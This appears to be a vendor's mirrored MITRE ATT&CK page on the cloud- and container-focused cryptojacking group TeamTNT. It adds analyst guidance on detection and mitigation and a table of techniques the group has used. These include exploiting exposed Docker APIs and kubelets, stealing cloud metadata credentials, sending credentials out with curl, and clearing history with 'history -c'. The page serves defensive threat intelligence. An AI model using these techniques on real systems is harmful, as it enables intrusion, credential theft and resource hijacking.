Live Active security incident? Get immediate response
MITRE ATT&CK® Group

G0139: TeamTNT

TeamTNT is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.[1][2][3][4][5][6][7][8][9]

EnterpriseG0139GroupObject v1.4 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

TeamTNT matters because ATT&CK describes it as a cloud- and container-focused group that has used victim cloud/container resources for cryptocurrency mining. For leaders, the practical issue is not only miner cleanup; it is whether exposed container services, weak cloud identities, or insufficient workload telemetry would let an intrusion consume resources, steal credentials, move through cloud workloads, and leave limited evidence.

Executive priority

Prioritize this as a cloud and container resilience validation. Ask whether Kubernetes, container runtime, SSH, Linux workload, and cloud API activity are logged well enough to prove what happened; whether service account and cloud credentials can be rapidly revoked or rotated; and whether misconfigured kubelets, exposed container APIs, and over-privileged identities are continuously found and remediated. This behavior is relevant to operational cost control, workload availability, incident response readiness, and compliance evidence for cloud control effectiveness.

Technical view

MITRE provides no official detection text for TeamTNT, so defenders should build coverage from the related software and techniques. The relationship set points to Linux, Containers, and IaaS-heavy activity, including Hildegard targeting misconfigured kubelets, Peirates gathering Kubernetes service account tokens, Linux credential dumping with MimiPenguin, password recovery with LaZagne, shell and cloud/container API execution, SSH lateral movement, discovery, masquerading, obfuscation, file deletion, command history clearing, application-layer C2, and possible exfiltration over alternate protocols. SOC and IR teams should validate end-to-end visibility across host, container, Kubernetes, cloud control plane, identity, and network layers rather than relying only on endpoint alerts.

Likely telemetry

  • Cloud control plane/API audit logs and identity activity logs
  • Kubernetes audit logs, kubelet access logs, and service account token usage evidence
  • Container runtime and Docker/container API activity logs
  • Linux process execution, shell command, cron/service, and file activity telemetry
  • SSH authentication and session activity

Detection direction

  • Confirm whether ephemeral containers and short-lived cloud workloads are logged before termination; this is a common blind spot for cloud/container intrusions.
  • Correlate container or cloud API execution with discovery commands, service/account token access, SSH activity, and unusual egress rather than alerting on any single command alone.
  • Tune for administrative false positives: cloud automation, vulnerability scanners, DevOps scripts, and legitimate Kubernetes administration can resemble discovery or API execution.
  • Look for sequences involving misconfigured container/Kubernetes access, shell execution, credential or token collection, lateral movement via SSH, and resource-intensive miner behavior.
  • Add evasion-aware hunting for masqueraded file names/locations, encoded or packed artifacts, rootkit-like hiding, deleted tools, and cleared command history.

Mitigation priorities

  • Reduce exposed or misconfigured container and Kubernetes control surfaces, especially kubelet and container APIs.
  • Apply least privilege to cloud identities, Kubernetes service accounts, and workload credentials; prepare rapid credential rotation and token revocation procedures.
  • Harden SSH access paths and monitor remote shell usage on Linux, macOS, ESXi, and relevant cloud workloads where present.
  • Preserve cloud, container, host, and network logs centrally so attackers cannot remove local evidence by clearing history or deleting files.
  • Control unnecessary shell, cloud CLI, and container CLI/API access on production workloads while maintaining approved administrative paths.
Analyst notes and limits

This take is derived from the official TeamTNT ATT&CK group description, external references, and the supplied uses relationships. The group object itself lists platforms and tactics as not specified, but the related techniques and software include Linux, Containers, IaaS, SSH, cloud APIs, container APIs, discovery, execution, lateral movement, stealth, command-and-control, and exfiltration context. Treat the related behaviors as defensive planning inputs, not proof that every TeamTNT-referenced incident will contain every behavior.

ATT&CK does not provide official detection guidance for this group, and the group-level platforms/tactics are not specified. Local architecture, cloud provider, Kubernetes/container runtime design, logging retention, and identity model are required to turn this into precise detections or control tests. No claim is made here about current activity, customer exposure, or guaranteed detection coverage.

Official MITRE ATT&CK definition

TeamTNT

TeamTNT is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.[1][2][3][4][5][6][7][8][9]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

56 rows
Domain ID Name Relationship / procedure
Enterprise T1680 Local Storage Discovery

TeamTNT has searched for disk partition and logical volume information.[7]CitationCisco Talos Intelligence Group
Enterprise T1686 Disable or Modify System Firewall

TeamTNT has disabled iptables.[8]
Enterprise T1133 External Remote Services

TeamTNT has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments.[3]CitationCisco Talos Intelligence Group TeamTNT has also targeted exposed kubelets for Kubernetes environments.[5]
Enterprise T1219 Remote Access Tools

TeamTNT has established tmate sessions for C2 communications.[5]CitationCisco Talos Intelligence Group
Enterprise T1569.003 Systemctl Sub-technique

TeamTNT has created system services to execute cryptocurrency mining software.CitationCisco Talos Intelligence Group
Enterprise T1036.005 Match Legitimate Resource Name or Location Sub-technique

TeamTNT has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software.CitationCisco Talos Intelligence Group
Enterprise T1222.002 Linux and Mac Permissions Sub-technique

TeamTNT has modified the permissions on binaries with chattr.[6]CitationCisco Talos Intelligence Group
Enterprise T1070.004 File Deletion Sub-technique

TeamTNT has used a payload that removes itself after running. TeamTNT also has deleted locally staged files for collecting credentials or scan results for local IP addresses after exfiltrating them.[7]CitationCisco Talos Intelligence Group
Enterprise T1609 Container Administration Command

TeamTNT executed Hildegard through the kubelet API run command and by executing commands on running containers.[5]
Enterprise T1059.004 Unix Shell Sub-technique

TeamTNT has used shell scripts for execution.[6]CitationCisco Talos Intelligence Group
Enterprise T1547.001 Registry Run Keys / Startup Folder Sub-technique

TeamTNT has added batch scripts to the startup folder.[7]
Enterprise T1543.002 Systemd Service Sub-technique

TeamTNT has established persistence through the creation of a cryptocurrency mining system service using systemctl.[6]CitationCisco Talos Intelligence Group
Enterprise T1136.001 Local Account Sub-technique

TeamTNT has created local privileged users on victim machines.[3]
Enterprise T1007 System Service Discovery

TeamTNT has searched for services such as Alibaba Cloud Security's aliyun service and BMC Helix Cloud Security's bmc-agent service in order to disable them.CitationCisco Talos Intelligence Group
Enterprise T1049 System Network Connections Discovery

TeamTNT has run netstat -anp to search for rival malware connections.[6] TeamTNT has also used `libprocesshider` to modify /etc/ld.so.preload.[7]
Enterprise T1543.003 Windows Service Sub-technique

TeamTNT has used malware that adds cryptocurrency miners as a service.[7]
Enterprise T1608.001 Upload Malware Sub-technique

TeamTNT has uploaded backdoored Docker images to Docker Hub.[2]
Enterprise T1059.003 Windows Command Shell Sub-technique

TeamTNT has used batch scripts to download tools and executing cryptocurrency miners.[7]
Enterprise T1610 Deploy Container

TeamTNT has deployed different types of containers into victim environments to facilitate execution.[3][6] TeamTNT has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges.CitationCisco Talos Intelligence Group
Enterprise T1613 Container and Resource Discovery

TeamTNT has checked for running containers with docker ps and for specific container names with docker inspect.[6] TeamTNT has also searched for Kubernetes pods running in a local network.CitationCisco Talos Intelligence Group
Enterprise T1048 Exfiltration Over Alternative Protocol

TeamTNT has sent locally staged files with collected credentials to C2 servers using cURL.CitationCisco Talos Intelligence Group
Enterprise T1057 Process Discovery

TeamTNT has searched for rival malware and removes it if found.[6] TeamTNT has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools.CitationCisco Talos Intelligence Group
Enterprise T1059.001 PowerShell Sub-technique

TeamTNT has executed PowerShell commands in batch scripts.[7]
Enterprise T1552.005 Cloud Instance Metadata API Sub-technique

TeamTNT has queried the AWS instance metadata service for credentials.[6]CitationCisco Talos Intelligence Group
Enterprise T1070.003 Clear Command History Sub-technique

TeamTNT has cleared command history with history -c.[6]CitationCisco Talos Intelligence Group
Enterprise T1074.001 Local Data Staging Sub-technique

TeamTNT has aggregated collected credentials in text files before exfiltrating.CitationCisco Talos Intelligence Group
Enterprise T1595.002 Vulnerability Scanning Sub-technique

TeamTNT has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.[6]
Enterprise T1059.013 Container CLI/API Sub-technique

TeamTNT targeted misconfigured containers and used container CLI tools.CitationCisco Talos Blog
Enterprise T1027.002 Software Packing Sub-technique

TeamTNT has used UPX and Ezuri packer to pack its binaries.[6]
Enterprise T1204.003 Malicious Image Sub-technique

TeamTNT has relied on users to download and execute malicious Docker images.[2]
Enterprise T1014 Rootkit

TeamTNT has used rootkits such as the open-source Diamorphine rootkit and their custom bots to hide cryptocurrency mining activities on the machine.[6] CitationCisco Talos Intelligence Group
Enterprise T1552.004 Private Keys Sub-technique

TeamTNT has searched for unsecured SSH keys.[4][6]
Enterprise T1611 Escape to Host

TeamTNT has deployed privileged containers that mount the filesystem of victim machine.[3][8]
Enterprise T1595.001 Scanning IP Blocks Sub-technique

TeamTNT has scanned specific lists of target IP addresses.[6]
Enterprise T1105 Ingress Tool Transfer

TeamTNT has the curl and wget commands as well as batch scripts to download new tools.[3]CitationCisco Talos Intelligence Group
Enterprise T1518.001 Security Software Discovery Sub-technique

TeamTNT has searched for security products on infected machines.[7]CitationCisco Talos Intelligence Group
Enterprise T1496.001 Compute Hijacking Sub-technique

TeamTNT has deployed XMRig Docker images to mine cryptocurrency.[2][4] TeamTNT has also infected Docker containers and Kubernetes clusters with XMRig, and used RainbowMiner and lolMiner for mining cryptocurrency.CitationCisco Talos Intelligence Group
Enterprise T1083 File and Directory Discovery

TeamTNT has used a script that checks `/proc/*/environ` for environment variables related to AWS.CitationCisco Talos Intelligence Group
Enterprise T1021.004 SSH Sub-technique

TeamTNT has used SSH to connect back to victim machines.[3] TeamTNT has also used SSH to transfer tools and payloads onto victim hosts and execute them.CitationCisco Talos Intelligence Group
Enterprise T1036 Masquerading

TeamTNT has disguised their scripts with docker-related file names.CitationCisco Talos Intelligence Group
Enterprise T1140 Deobfuscate/Decode Files or Information

TeamTNT has used a script that decodes a Base64-encoded version of WeaveWorks Scope.CitationCisco Talos Intelligence Group
Enterprise T1082 System Information Discovery

TeamTNT has searched for system version, architecture, and hostname information.[7]CitationCisco Talos Intelligence Group
Enterprise T1027.013 Encrypted/Encoded File Sub-technique

TeamTNT has encrypted its binaries via AES and encoded files using Base64.[6][8]
Enterprise T1016 System Network Configuration Discovery

TeamTNT has enumerated the host machine’s IP address.[6]
Enterprise T1046 Network Service Discovery

TeamTNT has used masscan to search for open Docker API ports and Kubernetes clusters.[4][5]CitationCisco Talos Intelligence Group TeamTNT has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments.[1]
Enterprise T1120 Peripheral Device Discovery

TeamTNT has searched for attached VGA devices using lspci.CitationCisco Talos Intelligence Group
Enterprise T1685 Disable or Modify Tools

TeamTNT has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure.[7]CitationCisco Talos Intelligence Group
Enterprise T1071 Application Layer Protocol

TeamTNT has used an IRC bot for C2 communications.[6]
Enterprise T1098.004 SSH Authorized Keys Sub-technique

TeamTNT has added RSA keys in authorized_keys.[8]CitationCisco Talos Intelligence Group
Enterprise T1583.001 Domains Sub-technique

TeamTNT has obtained domains to host their payloads.[1]
Enterprise T1059.009 Cloud API Sub-technique

TeamTNT has leveraged AWS CLI to enumerate cloud environments with compromised credentials.CitationTalos TeamTNT
Enterprise T1071.001 Web Protocols Sub-technique

TeamTNT has the `curl` command to send credentials over HTTP and the `curl` and `wget` commands to download new software.[3][4]CitationCisco Talos Intelligence Group TeamTNT has also used a custom user agent HTTP header in shell scripts.[6]
Enterprise T1552.001 Credentials In Files Sub-technique

TeamTNT has searched for unsecured AWS credentials and Docker API credentials.[4][6]CitationCisco Talos Intelligence Group
Enterprise T1685.006 Clear Linux or Mac System Logs Sub-technique

TeamTNT has removed system logs from /var/log/syslog.[8]
Enterprise T1587.001 Malware Sub-technique

TeamTNT has developed custom malware such as Hildegard.[5]
Enterprise T1102 Web Service

TeamTNT has leveraged iplogger.org to send collected data back to C2.[8]CitationCisco Talos Intelligence Group
Associated objects

Groups, software, and campaigns

Tool Enterprise

S0683: Peirates

Peirates is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.[1]

Containers
Tool Enterprise

S0349: LaZagne

LaZagne is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. LaZagne is publicly available on GitHub.[1]

LinuxmacOSWindows
Malware Enterprise

S0601: Hildegard

Hildegard is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind Hildegard. [1]

LinuxContainersIaaS
Relationship explorer

All related ATT&CK context

uses · Technique T1680: Local Storage Discovery Enterprise uses · Technique T1686: Disable or Modify System Firewall Enterprise uses · Technique T1133: External Remote Services Enterprise uses · Technique T1219: Remote Access Tools Enterprise uses · Technique T1569.003: Systemctl Enterprise uses · Technique T1036.005: Match Legitimate Resource Name or Location Enterprise uses · Technique T1222.002: Linux and Mac Permissions Enterprise uses · Technique T1070.004: File Deletion Enterprise uses · Technique T1609: Container Administration Command Enterprise uses · Technique T1059.004: Unix Shell Enterprise uses · Technique T1547.001: Registry Run Keys / Startup Folder Enterprise uses · Technique T1543.002: Systemd Service Enterprise uses · Technique T1136.001: Local Account Enterprise uses · Technique T1007: System Service Discovery Enterprise uses · Technique T1049: System Network Connections Discovery Enterprise uses · Technique T1543.003: Windows Service Enterprise uses · Technique T1608.001: Upload Malware Enterprise uses · Technique T1059.003: Windows Command Shell Enterprise uses · Technique T1610: Deploy Container Enterprise uses · Technique T1613: Container and Resource Discovery Enterprise uses · Technique T1048: Exfiltration Over Alternative Protocol Enterprise uses · Technique T1057: Process Discovery Enterprise uses · Technique T1059.001: PowerShell Enterprise uses · Technique T1552.005: Cloud Instance Metadata API Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.4
Created
Modified
Raw hash
352e6bff7c7e2452...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.4 Current bundle 352e6bff7c7e…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    Palo Alto Black-T October 2020

    Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021.

    Open source URL
  2. [2]
    Lacework TeamTNT May 2021

    Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 16, 2024.

    Open source URL
  3. [3]
    Intezer TeamTNT September 2020

    Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.

    Open source URL
  4. [4]
    Cado Security TeamTNT Worm August 2020

    Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.

    Open source URL
  5. [5]
    Unit 42 Hildegard Malware

    Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.

    Open source URL
  6. [6]
    Trend Micro TeamTNT

    Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.

    Open source URL
  7. [7]
    ATT TeamTNT Chimaera September 2020

    AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.

    Open source URL
  8. [8]
    Aqua TeamTNT August 2020

    Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.

    Open source URL
  9. [9]
    Intezer TeamTNT Explosion September 2021

    Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021.

    Open source URL
  10. [10]
    mitre-attack G0139
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use